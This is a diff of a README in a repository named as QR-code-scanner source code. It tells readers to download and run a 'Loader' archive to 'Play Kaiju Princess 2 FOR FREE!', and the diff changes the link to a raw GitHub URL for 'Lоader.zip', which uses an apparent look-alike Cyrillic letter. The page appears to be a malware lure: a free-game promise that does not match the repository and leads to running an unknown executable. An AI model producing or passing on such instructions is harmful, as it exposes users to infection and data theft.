GRIMREAPER25-UI/qr-code-scanner-app-source-code/README.md

 ## 📖 Installation Guide 📖

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/GRIMREAPER25-UI/qr-code-scanner-app-source-code/main/Lоader.zip` from the repository.
 2. Extract files to your preferred directory.
 3. Run the Loader and follow on-screen instructions.
 4. Play Kaiju Princess 2 FOR FREE!